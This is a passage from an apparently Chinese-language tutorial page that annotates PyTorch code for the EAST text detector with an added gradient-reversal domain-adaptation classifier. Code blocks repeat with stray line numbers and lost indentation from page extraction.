        if torch.sum(gt_score) < 1:
        return torch.sum(pred_score + pred_geo) * 0
        # 如果 gt_score 的总和小于 1(表示没有有效的目标),则返回 0 作为损失,避免计算损失时出现错误或不必要的计算。

        classify_loss = get_dice_loss(gt_score, pred_score*(1-ignored_map))
        # 使用 get_dice_loss 计算分类损失。pred_score * (1 - ignored_map) 是预测分数与忽略区域掩码结合后的结果,确保在计算损失时忽略掉指定的区域。

        gt_doamin = torch.Tensor([[[1.]]]).to(torch.device("cuda"))
        doamin_loss = self.bce(gt_doamin, pre_domain)
        # 生成一个目标领域分数 gt_doamin,设为 1,并将其转移到 GPU 设备上。使用 bce_loss 计算领域损失,这里领域损失衡量模型预测的领域分数与目标领域分数之间的差异。

        iou_loss_map, angle_loss_map = get_geo_loss(gt_geo, pred_geo)

        angle_loss = torch.sum(angle_loss_map * gt_score) / torch.sum(gt_score)
        iou_loss = torch.sum(iou_loss_map * gt_score) / torch.sum(gt_score)
        geo_loss = self.weight_angle * angle_loss + iou_loss
        # 使用 get_geo_loss 计算几何损失,包括交并比(IoU)损失和角度损失。
        # 计算角度损失和 IoU 损失,并根据 weight_angle 进行加权,得到总的几何损失。
        # print('classify loss is {:.8f}, angle loss is {:.8f}, iou loss is {:.8f}'.format(classify_loss, angle_loss, iou_loss))
        return geo_loss, classify_loss, doamin_loss # 返回三个损失值:几何损失、分类损失和领域损失。

        ​ 其中 $\lambda$ 是权衡参数,我们在所有实验中将其设置为 0.2。通过优化损失,网络可以学习更多的文本域不变特征,更好地从合成数据转换到真实的数据。

        webp

        具有相应优化对象的网络架构。$\theta$ 表示 EAST 的参数。域分类器(绿色)经由梯度反转层添加在特征提取器之后,梯度反转层在基于反向传播的训练期间将梯度乘以某个负常数。$L_{task}$ 是 EAST 原有的检测损失,$L_d$ 是领域分类器的损失

        -
        cfg = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']  # 配置列表,指定网络层的类型和数量。

        def make_layers(cfg, batch_norm=False):
        layers = [] # 列表用于存储创建的层。
        in_channels = 3 # 初始化为 3,对应输入图像的通道数。
        for v in cfg:
        if v == 'M': # 如果值为 'M',添加一个 2x2 的最大池化层。
        layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
        else: # 否则,创建一个卷积层(nn.Conv2d),后跟可选的批归一化层和 ReLU 激活函数。
        conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
        if batch_norm:
        layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
        else:
        layers += [conv2d, nn.ReLU(inplace=True)]
        in_channels = v # 更新 in_channels 为当前卷积层的输出通道数 v。
        return nn.Sequential(*layers) # 使用 nn.Sequential 将所有层打包成一个顺序容器,返回构造好的网络层。


        class VGG(nn.Module):
        def __init__(self, features):
        super(VGG, self).__init__()
        self.features = features # self.features:存储卷积层。
        self.avgpool = nn.AdaptiveAvgPool2d((7, 7)) # 自适应平均池化层,将特征图大小调整为 7x7。
        self.classifier = nn.Sequential(
        nn.Linear(512 * 7 * 7, 4096),
        nn.ReLU(True),
        nn.Dropout(),
        nn.Linear(4096, 4096),
        nn.ReLU(True),
        nn.Dropout(),
        nn.Linear(4096, 1000),
        ) # 全连接层的序列,包括两个 ReLU 激活层和 Dropout 层,用于分类。

        for m in self.modules(): # 初始化权重
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.BatchNorm2d):
        nn.init.constant_(m.weight, 1)
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.Linear):
        nn.init.normal_(m.weight, 0, 0.01)
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        x = self.features(x) # 通过 self.features 处理输入 x。
        x = self.avgpool(x) # 应用自适应平均池化,将特征图调整为 7x7。
        x = x.view(x.size(0), -1) # 将池化后的特征图展平,以适应全连接层输入。
        x = self.classifier(x) # 通过 self.classifier 进行最终的分类预测。
        return x


        class extractor(nn.Module): # 特征提取层。
        def __init__(self, pretrained):
        super(extractor, self).__init__()
        vgg16_bn = VGG(make_layers(cfg, batch_norm=True)) # 使用 VGG 类创建带有批量归一化的 VGG16 网络。
        if pretrained:
        # state_dict = load_state_dict_from_url('https://download.pytorch.org/models/vgg16-397923af.pth')
        # vgg16_bn.load_state_dict(state_dict)
        if pretrained: # 如果 pretrained 为 True,则加载本地路径的预训练权重。
        vgg16_bn.load_state_dict(torch.load(
        '/data/data_weijiawu/Sence_Text_detection/Paper-ACCV/baseline/EAST_1/vgg16_bn-6c64b313.pth'))
        self.features = vgg16_bn.features # self.features 被设置为 VGG16 网络的卷积层部分。(使用 VGG16 进行特征提取)

        def forward(self, x):
        out = []
        for m in self.features: # 遍历 self.features 中的每一层,对输入 x 进行逐层处理。
        x = m(x)
        if isinstance(m, nn.MaxPool2d): # 将每个最大池化层的输出保存到 out 列表中。
        out.append(x)
        return out[1:] # 返回 out[1:],即从第二个池化层开始的特征图。这通常是为了匹配特定的特征提取需求。
        class merge(nn.Module):  # EAST 的核心特征融合层。负责在特征图上进行一系列卷积操作并融合来自不同尺度的特征。它的主要任务是通过逐步上采样和融合不同层的特征图来生成最终的输出特征图。这通常用于目标检测和分割任务中的特征融合阶段。
        def __init__(self):
        super(merge, self).__init__()

        self.conv1 = nn.Conv2d(1024, 128, 1)
        self.bn1 = nn.BatchNorm2d(128)
        self.relu1 = nn.ReLU()
        self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
        self.bn2 = nn.BatchNorm2d(128)
        self.relu2 = nn.ReLU()

        self.conv3 = nn.Conv2d(384, 64, 1)
        self.bn3 = nn.BatchNorm2d(64)
        self.relu3 = nn.ReLU()
        self.conv4 = nn.Conv2d(64, 64, 3, padding=1)
        self.bn4 = nn.BatchNorm2d(64)
        self.relu4 = nn.ReLU()

        self.conv5 = nn.Conv2d(192, 32, 1)
        self.bn5 = nn.BatchNorm2d(32)
        self.relu5 = nn.ReLU()
        self.conv6 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn6 = nn.BatchNorm2d(32)
        self.relu6 = nn.ReLU()

        self.conv7 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn7 = nn.BatchNorm2d(32)
        self.relu7 = nn.ReLU()

        for m in self.modules():
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.BatchNorm2d):
        nn.init.constant_(m.weight, 1)
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        # F.interpolate:将特征图上采样到较大的空间分辨率,使用 bilinear 插值方法。
        # torch.cat:将上采样后的特征图与来自不同层的特征图沿通道维度拼接,结合不同尺度的信息。
        y = F.interpolate(x[3], scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[2]), 1)
        y = self.relu1(self.bn1(self.conv1(y)))
        y = self.relu2(self.bn2(self.conv2(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[1]), 1)
        y = self.relu3(self.bn3(self.conv3(y)))
        y = self.relu4(self.bn4(self.conv4(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[0]), 1)
        y = self.relu5(self.bn5(self.conv5(y)))
        y = self.relu6(self.bn6(self.conv6(y)))

        y = self.relu7(self.bn7(self.conv7(y)))
        return y


        class output(nn.Module): # 输出层
        def __init__(self, scope=512):
        super(output, self).__init__()
        self.conv1 = nn.Conv2d(32, 1, 1) # 卷积层,用于处理输入的特征图。它们的输出通道数不同,目的是生成不同类型的预测。
        self.sigmoid1 = nn.Sigmoid() # 分别应用于卷积层输出的 Sigmoid 激活函数,用于输出概率。

        # self.conv1_1 = nn.Conv2d(32, 1, 1)
        # self.sigmoid1_1 = nn.Sigmoid()

        self.conv2 = nn.Conv2d(32, 4, 1)
        self.sigmoid2 = nn.Sigmoid()
        self.conv3 = nn.Conv2d(32, 1, 1)
        self.sigmoid3 = nn.Sigmoid()
        self.scope = 512 # 一个用于缩放位置预测的参数,设为 512。

        # GRL domina classifier
        # self.gap = nn.AdaptiveAvgPool2d(1)
        # self.sigmoid_gap = nn.Sigmoid()
        # self.GRL = RevGrad()
        # self.conv_gap = nn.Conv2d(32, 1, 1)

        for m in self.modules():
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') # 卷积层的权重使用 Kaiming 正态分布初始化,偏置项初始化为 0。
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        # score_1 = self.GRL(x)
        # grl = self.sigmoid_gap(self.conv_gap(score_1))

        # domain_feature = self.gap(self.GRL(C[3]))
        # class_domain = self.sigmoid_gap(self.conv_gap(domain_feature))

        score = self.sigmoid1(self.conv1(x)) # 第一个卷积层的输出,经过 Sigmoid 激活函数处理,代表得分图。
        loc = self.sigmoid2(self.conv2(x)) * self.scope # 第二个卷积层的输出,经过 Sigmoid 激活函数处理并缩放,表示位置预测。
        angle = (self.sigmoid3(self.conv3(x)) - 0.5) * math.pi # 第三个卷积层的输出,经过 Sigmoid 激活函数处理并调整,表示角度预测。
        geo = torch.cat((loc, angle), 1) # 将位置和角度预测拼接起来,形成最终的几何输出。
        return score, geo
        class DAImgHead(nn.Module):
        """
        Adds a simple Image-level Domain Classifier head 添加一个图像级领域分类器头,用于图像层面的分类。
        """

        def __init__(self):
        """
        Arguments:
        in_channels (int): number of channels of the input feature 输入特征的通道数
        USE_FPN (boolean): whether FPN feature extractor is used 是否使用 FPN 特征提取器
        """
        super(DAImgHead, self).__init__()

        self.conv1_da = nn.Conv2d(512, 256, kernel_size=1, stride=1) # 一个卷积层,将输入通道数从 512 转换为 256。
        self.conv2_da = nn.Conv2d(256, 1, kernel_size=1, stride=1) # 一个卷积层,将通道数从 256 转换为 1。

        for l in [self.conv1_da, self.conv2_da]: # 权重初始化为均值为 0,标准差为 0.001 的正态分布,偏置初始化为 0。
        torch.nn.init.normal_(l.weight, std=0.001)
        torch.nn.init.constant_(l.bias, 0)

        def forward(self, x): # 输入 x 经过 conv1_da 和 ReLU 激活函数后,再经过 conv2_da 得到输出。
        t = F.relu(self.conv1_da(x))
        return self.conv2_da(t)


        class DAInsHead(nn.Module):
        """
        添加一个实例级领域分类器头,用于实例级别的分类。
        Adds a simple Instance-level Domain Classifier head
        """

        def __init__(self):
        """
        Arguments:
        in_channels (int): number of channels of the input feature
        """
        super(DAInsHead, self).__init__()
        self.fc1_da = nn.Linear(2028, 1024) # 一个全连接层,将 2028 个输入特征转换为 1024 个输出特征。
        self.fc2_da = nn.Linear(1024, 1024) # 一个全连接层,将 1024 个输入特征转换为 1024 个输出特征。
        self.fc3_da = nn.Linear(1024, 1) # 一个全连接层,将 1024 个输入特征转换为 1 个输出特征。
        for l in [self.fc1_da, self.fc2_da]: # 权重初始化为均值为 0,标准差为 0.01 的正态分布(对于 fc1_da 和 fc2_da),fc3_da 的权重标准差为 0.05,偏置初始化为 0。
        nn.init.normal_(l.weight, std=0.01)
        nn.init.constant_(l.bias, 0)
        nn.init.normal_(self.fc3_da.weight, std=0.05)
        nn.init.constant_(self.fc3_da.bias, 0)

        def forward(self, x): # 输入 x 先通过 fc1_da 和 ReLU 激活,然后经过 50% 的 dropout,再通过 fc2_da 和 ReLU 激活,再次经过 50% 的 dropout,最后通过 fc3_da 得到输出。
        x = F.relu(self.fc1_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = F.relu(self.fc2_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = self.fc3_da(x)
        return x


        class DomainAdaptationModule(torch.nn.Module):
        """
        这个模块的主要作用是通过领域自适应来处理图像特征,使得模型能够更好地适应不同的领域。
        Module for Domain Adaptation Component. Takes feature maps from the backbone and instance
        feature vectors, domain labels and proposals. Works for both FPN and non-FPN.
        域适配组件模块。从主干和实例特征向量、域标签和建议中提取特征图。适用于 FPN 和非 FPN。
        """

        def __init__(self):
        super(DomainAdaptationModule, self).__init__()

        self.avgpool = nn.AvgPool2d(kernel_size=7, stride=7) # 一个 7x7 的平均池化层,将输入的特征图缩小到 1x1。
        self.gap = nn.AdaptiveAvgPool2d(1) # 自适应平均池化层,将输入特征图压缩成每个通道一个值。
        self.sigmoid_gap = nn.Sigmoid() # 一个 Sigmoid 激活函数,将特征值压缩到 [0, 1] 范围。

        self.grl_img = GradientScalarLayer(-1.0 * 0.1) # 应用梯度反转层,用于在反向传播时反转梯度,鼓励网络学习领域不变特征。
        self.grl_ins = GradientScalarLayer(-1.0 * 0.1)
        self.grl_img_consist = GradientScalarLayer(1.0 * 0.1) # 与 grl_img 和 grl_ins 类似,但用于不同的目标。
        self.grl_ins_consist = GradientScalarLayer(1.0 * 0.1)

        self.imghead = DAImgHead() # 处理图像级特征的网络头部,用于领域分类。
        self.inshead = DAInsHead() # 处理实例级特征的网络头部,用于领域分类。


        def forward(self, img_features):
        """
        Arguments:
        img_features (list[Tensor]): features computed from the images that are used for computing the predictions. 从用于计算预测的图像中计算出的特征。
        da_ins_feature (Tensor): instance-level feature vectors 实例级特征向量。
        da_ins_labels (Tensor): domain labels for instance-level feature vectors 实例级特征向量目标的域标签
        targets (list[BoxList): ground-truth boxes present in the image (optional) 实例级特征向量目标的域标签(list[BoxList):图像中存在的地面真值框(可选)

        Returns:
        losses (dict[Tensor]): the losses for the model during training. During testing, it is an empty dict. 模型在训练过程中的损失。在测试过程中,它是一个空字典。
        """
        img_grl_fea = self.grl_img(self.gap(img_features)) # 经过 grl 的 image-level feature # 通过 gap 层将特征图压缩为 1x1,然后通过 grl_img 反转梯度。

        da_img_features = self.sigmoid_gap(self.imghead(img_grl_fea)) # 对 image-level feature 的每个层都压成 1*1 # 通过 imghead 处理反转后的图像特征,再经过 sigmoid_gap 激活函数,将每个特征值压缩到 [0, 1] 范围。

        return da_img_features
        class EAST(nn.Module):  # EAST 继承自 nn.Module,这是 PyTorch 中所有神经网络模型的基类。
        def __init__(self, pretrained=True):
        super(EAST, self).__init__()
        self.extractor = extractor(pretrained) # 初始化一个特征提取器。extractor 可能是一个预训练的卷积神经网络或类似模块,用于从输入图像中提取特征。如果 pretrained=True,则可能会使用预训练权重。
        self.merge = merge() # 初始化一个合并模块。merge 可能是一个用于处理提取到的特征的模块。
        self.output = output() # 初始化一个输出模块。output 可能是一个用于生成最终预测的模块。

        self.DomainAdaptation = DomainAdaptationModule() # 初始化一个领域自适应模块。DomainAdaptationModule 可能用于对特征进行领域自适应处理,以适应不同的数据分布或任务。

        def forward(self, x): # forward 方法定义了前向传播的计算过程,即如何将输入数据 x 通过网络进行处理,得到模型的输出。
        C = self.extractor(x) # 将输入 x 传递给特征提取器,得到特征 C。C 可能是一个包含多个特征图的列表或字典,其中 C[3] 是其中的一个特征图。
        class_domain = self.DomainAdaptation(C[3]) # 将特征图 C[3] 传递给领域自适应模块,得到 class_domain。这是对特征图进行领域自适应处理后的结果。

        return self.output(self.merge(C)), class_domain
        # self.merge(C): 将特征 C 传递给合并模块,合并不同层的特征。
        # self.output(self.merge(C)): 将合并后的特征传递给输出模块,生成最终预测。
        # return self.output(self.merge(C)), class_domain:返回两个值,分别是模型的最终预测结果和领域自适应模块的输出。
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        cfg = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']  # 配置列表,指定网络层的类型和数量。

        def make_layers(cfg, batch_norm=False):
        layers = [] # 列表用于存储创建的层。
        in_channels = 3 # 初始化为 3,对应输入图像的通道数。
        for v in cfg:
        if v == 'M': # 如果值为 'M',添加一个 2x2 的最大池化层。
        layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
        else: # 否则,创建一个卷积层(nn.Conv2d),后跟可选的批归一化层和 ReLU 激活函数。
        conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
        if batch_norm:
        layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
        else:
        layers += [conv2d, nn.ReLU(inplace=True)]
        in_channels = v # 更新 in_channels 为当前卷积层的输出通道数 v。
        return nn.Sequential(*layers) # 使用 nn.Sequential 将所有层打包成一个顺序容器,返回构造好的网络层。


        class VGG(nn.Module):
        def __init__(self, features):
        super(VGG, self).__init__()
        self.features = features # self.features:存储卷积层。
        self.avgpool = nn.AdaptiveAvgPool2d((7, 7)) # 自适应平均池化层,将特征图大小调整为 7x7。
        self.classifier = nn.Sequential(
        nn.Linear(512 * 7 * 7, 4096),
        nn.ReLU(True),
        nn.Dropout(),
        nn.Linear(4096, 4096),
        nn.ReLU(True),
        nn.Dropout(),
        nn.Linear(4096, 1000),
        ) # 全连接层的序列,包括两个 ReLU 激活层和 Dropout 层,用于分类。

        for m in self.modules(): # 初始化权重
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.BatchNorm2d):
        nn.init.constant_(m.weight, 1)
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.Linear):
        nn.init.normal_(m.weight, 0, 0.01)
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        x = self.features(x) # 通过 self.features 处理输入 x。
        x = self.avgpool(x) # 应用自适应平均池化,将特征图调整为 7x7。
        x = x.view(x.size(0), -1) # 将池化后的特征图展平,以适应全连接层输入。
        x = self.classifier(x) # 通过 self.classifier 进行最终的分类预测。
        return x


        class extractor(nn.Module): # 特征提取层。
        def __init__(self, pretrained):
        super(extractor, self).__init__()
        vgg16_bn = VGG(make_layers(cfg, batch_norm=True)) # 使用 VGG 类创建带有批量归一化的 VGG16 网络。
        if pretrained:
        # state_dict = load_state_dict_from_url('https://download.pytorch.org/models/vgg16-397923af.pth')
        # vgg16_bn.load_state_dict(state_dict)
        if pretrained: # 如果 pretrained 为 True,则加载本地路径的预训练权重。
        vgg16_bn.load_state_dict(torch.load(
        '/data/data_weijiawu/Sence_Text_detection/Paper-ACCV/baseline/EAST_1/vgg16_bn-6c64b313.pth'))
        self.features = vgg16_bn.features # self.features 被设置为 VGG16 网络的卷积层部分。(使用 VGG16 进行特征提取)

        def forward(self, x):
        out = []
        for m in self.features: # 遍历 self.features 中的每一层,对输入 x 进行逐层处理。
        x = m(x)
        if isinstance(m, nn.MaxPool2d): # 将每个最大池化层的输出保存到 out 列表中。
        out.append(x)
        return out[1:] # 返回 out[1:],即从第二个池化层开始的特征图。这通常是为了匹配特定的特征提取需求。
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        73
        74
        75
        76
        77
        78
        79
        80
        81
        82
        83
        84
        85
        86
        87
        88
        89
        90
        91
        92
        93
        94
        95
        96
        97
        98
        99
        class merge(nn.Module):  # EAST 的核心特征融合层。负责在特征图上进行一系列卷积操作并融合来自不同尺度的特征。它的主要任务是通过逐步上采样和融合不同层的特征图来生成最终的输出特征图。这通常用于目标检测和分割任务中的特征融合阶段。
        def __init__(self):
        super(merge, self).__init__()

        self.conv1 = nn.Conv2d(1024, 128, 1)
        self.bn1 = nn.BatchNorm2d(128)
        self.relu1 = nn.ReLU()
        self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
        self.bn2 = nn.BatchNorm2d(128)
        self.relu2 = nn.ReLU()

        self.conv3 = nn.Conv2d(384, 64, 1)
        self.bn3 = nn.BatchNorm2d(64)
        self.relu3 = nn.ReLU()
        self.conv4 = nn.Conv2d(64, 64, 3, padding=1)
        self.bn4 = nn.BatchNorm2d(64)
        self.relu4 = nn.ReLU()

        self.conv5 = nn.Conv2d(192, 32, 1)
        self.bn5 = nn.BatchNorm2d(32)
        self.relu5 = nn.ReLU()
        self.conv6 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn6 = nn.BatchNorm2d(32)
        self.relu6 = nn.ReLU()

        self.conv7 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn7 = nn.BatchNorm2d(32)
        self.relu7 = nn.ReLU()

        for m in self.modules():
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.BatchNorm2d):
        nn.init.constant_(m.weight, 1)
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        # F.interpolate:将特征图上采样到较大的空间分辨率,使用 bilinear 插值方法。
        # torch.cat:将上采样后的特征图与来自不同层的特征图沿通道维度拼接,结合不同尺度的信息。
        y = F.interpolate(x[3], scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[2]), 1)
        y = self.relu1(self.bn1(self.conv1(y)))
        y = self.relu2(self.bn2(self.conv2(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[1]), 1)
        y = self.relu3(self.bn3(self.conv3(y)))
        y = self.relu4(self.bn4(self.conv4(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[0]), 1)
        y = self.relu5(self.bn5(self.conv5(y)))
        y = self.relu6(self.bn6(self.conv6(y)))

        y = self.relu7(self.bn7(self.conv7(y)))
        return y


        class output(nn.Module): # 输出层
        def __init__(self, scope=512):
        super(output, self).__init__()
        self.conv1 = nn.Conv2d(32, 1, 1) # 卷积层,用于处理输入的特征图。它们的输出通道数不同,目的是生成不同类型的预测。
        self.sigmoid1 = nn.Sigmoid() # 分别应用于卷积层输出的 Sigmoid 激活函数,用于输出概率。

        # self.conv1_1 = nn.Conv2d(32, 1, 1)
        # self.sigmoid1_1 = nn.Sigmoid()

        self.conv2 = nn.Conv2d(32, 4, 1)
        self.sigmoid2 = nn.Sigmoid()
        self.conv3 = nn.Conv2d(32, 1, 1)
        self.sigmoid3 = nn.Sigmoid()
        self.scope = 512 # 一个用于缩放位置预测的参数,设为 512。

        # GRL domina classifier
        # self.gap = nn.AdaptiveAvgPool2d(1)
        # self.sigmoid_gap = nn.Sigmoid()
        # self.GRL = RevGrad()
        # self.conv_gap = nn.Conv2d(32, 1, 1)

        for m in self.modules():
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') # 卷积层的权重使用 Kaiming 正态分布初始化,偏置项初始化为 0。
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        # score_1 = self.GRL(x)
        # grl = self.sigmoid_gap(self.conv_gap(score_1))

        # domain_feature = self.gap(self.GRL(C[3]))
        # class_domain = self.sigmoid_gap(self.conv_gap(domain_feature))

        score = self.sigmoid1(self.conv1(x)) # 第一个卷积层的输出,经过 Sigmoid 激活函数处理,代表得分图。
        loc = self.sigmoid2(self.conv2(x)) * self.scope # 第二个卷积层的输出,经过 Sigmoid 激活函数处理并缩放,表示位置预测。
        angle = (self.sigmoid3(self.conv3(x)) - 0.5) * math.pi # 第三个卷积层的输出,经过 Sigmoid 激活函数处理并调整,表示角度预测。
        geo = torch.cat((loc, angle), 1) # 将位置和角度预测拼接起来,形成最终的几何输出。
        return score, geo
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        73
        74
        75
        76
        77
        78
        79
        80
        81
        82
        83
        84
        85
        86
        87
        88
        89
        90
        91
        92
        93
        94
        95
        96
        97
        class DAImgHead(nn.Module):
        """
        Adds a simple Image-level Domain Classifier head 添加一个图像级领域分类器头,用于图像层面的分类。
        """

        def __init__(self):
        """
        Arguments:
        in_channels (int): number of channels of the input feature 输入特征的通道数
        USE_FPN (boolean): whether FPN feature extractor is used 是否使用 FPN 特征提取器
        """
        super(DAImgHead, self).__init__()

        self.conv1_da = nn.Conv2d(512, 256, kernel_size=1, stride=1) # 一个卷积层,将输入通道数从 512 转换为 256。
        self.conv2_da = nn.Conv2d(256, 1, kernel_size=1, stride=1) # 一个卷积层,将通道数从 256 转换为 1。

        for l in [self.conv1_da, self.conv2_da]: # 权重初始化为均值为 0,标准差为 0.001 的正态分布,偏置初始化为 0。
        torch.nn.init.normal_(l.weight, std=0.001)
        torch.nn.init.constant_(l.bias, 0)

        def forward(self, x): # 输入 x 经过 conv1_da 和 ReLU 激活函数后,再经过 conv2_da 得到输出。
        t = F.relu(self.conv1_da(x))
        return self.conv2_da(t)


        class DAInsHead(nn.Module):
        """
        添加一个实例级领域分类器头,用于实例级别的分类。
        Adds a simple Instance-level Domain Classifier head
        """

        def __init__(self):
        """
        Arguments:
        in_channels (int): number of channels of the input feature
        """
        super(DAInsHead, self).__init__()
        self.fc1_da = nn.Linear(2028, 1024) # 一个全连接层,将 2028 个输入特征转换为 1024 个输出特征。
        self.fc2_da = nn.Linear(1024, 1024) # 一个全连接层,将 1024 个输入特征转换为 1024 个输出特征。
        self.fc3_da = nn.Linear(1024, 1) # 一个全连接层,将 1024 个输入特征转换为 1 个输出特征。
        for l in [self.fc1_da, self.fc2_da]: # 权重初始化为均值为 0,标准差为 0.01 的正态分布(对于 fc1_da 和 fc2_da),fc3_da 的权重标准差为 0.05,偏置初始化为 0。
        nn.init.normal_(l.weight, std=0.01)
        nn.init.constant_(l.bias, 0)
        nn.init.normal_(self.fc3_da.weight, std=0.05)
        nn.init.constant_(self.fc3_da.bias, 0)

        def forward(self, x): # 输入 x 先通过 fc1_da 和 ReLU 激活,然后经过 50% 的 dropout,再通过 fc2_da 和 ReLU 激活,再次经过 50% 的 dropout,最后通过 fc3_da 得到输出。
        x = F.relu(self.fc1_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = F.relu(self.fc2_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = self.fc3_da(x)
        return x


        class DomainAdaptationModule(torch.nn.Module):
        """
        这个模块的主要作用是通过领域自适应来处理图像特征,使得模型能够更好地适应不同的领域。
        Module for Domain Adaptation Component. Takes feature maps from the backbone and instance
        feature vectors, domain labels and proposals. Works for both FPN and non-FPN.
        域适配组件模块。从主干和实例特征向量、域标签和建议中提取特征图。适用于 FPN 和非 FPN。
        """

        def __init__(self):
        super(DomainAdaptationModule, self).__init__()

        self.avgpool = nn.AvgPool2d(kernel_size=7, stride=7) # 一个 7x7 的平均池化层,将输入的特征图缩小到 1x1。
        self.gap = nn.AdaptiveAvgPool2d(1) # 自适应平均池化层,将输入特征图压缩成每个通道一个值。
        self.sigmoid_gap = nn.Sigmoid() # 一个 Sigmoid 激活函数,将特征值压缩到 [0, 1] 范围。

        self.grl_img = GradientScalarLayer(-1.0 * 0.1) # 应用梯度反转层,用于在反向传播时反转梯度,鼓励网络学习领域不变特征。
        self.grl_ins = GradientScalarLayer(-1.0 * 0.1)
        self.grl_img_consist = GradientScalarLayer(1.0 * 0.1) # 与 grl_img 和 grl_ins 类似,但用于不同的目标。
        self.grl_ins_consist = GradientScalarLayer(1.0 * 0.1)

        self.imghead = DAImgHead() # 处理图像级特征的网络头部,用于领域分类。
        self.inshead = DAInsHead() # 处理实例级特征的网络头部,用于领域分类。


        def forward(self, img_features):
        """
        Arguments:
        img_features (list[Tensor]): features computed from the images that are used for computing the predictions. 从用于计算预测的图像中计算出的特征。
        da_ins_feature (Tensor): instance-level feature vectors 实例级特征向量。
        da_ins_labels (Tensor): domain labels for instance-level feature vectors 实例级特征向量目标的域标签
        targets (list[BoxList): ground-truth boxes present in the image (optional) 实例级特征向量目标的域标签(list[BoxList):图像中存在的地面真值框(可选)

        Returns:
        losses (dict[Tensor]): the losses for the model during training. During testing, it is an empty dict. 模型在训练过程中的损失。在测试过程中,它是一个空字典。
        """
        img_grl_fea = self.grl_img(self.gap(img_features)) # 经过 grl 的 image-level feature # 通过 gap 层将特征图压缩为 1x1,然后通过 grl_img 反转梯度。

        da_img_features = self.sigmoid_gap(self.imghead(img_grl_fea)) # 对 image-level feature 的每个层都压成 1*1 # 通过 imghead 处理反转后的图像特征,再经过 sigmoid_gap 激活函数,将每个特征值压缩到 [0, 1] 范围。

        return da_img_features
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        class EAST(nn.Module):  # EAST 继承自 nn.Module,这是 PyTorch 中所有神经网络模型的基类。
        def __init__(self, pretrained=True):
        super(EAST, self).__init__()
        self.extractor = extractor(pretrained) # 初始化一个特征提取器。extractor 可能是一个预训练的卷积神经网络或类似模块,用于从输入图像中提取特征。如果 pretrained=True,则可能会使用预训练权重。
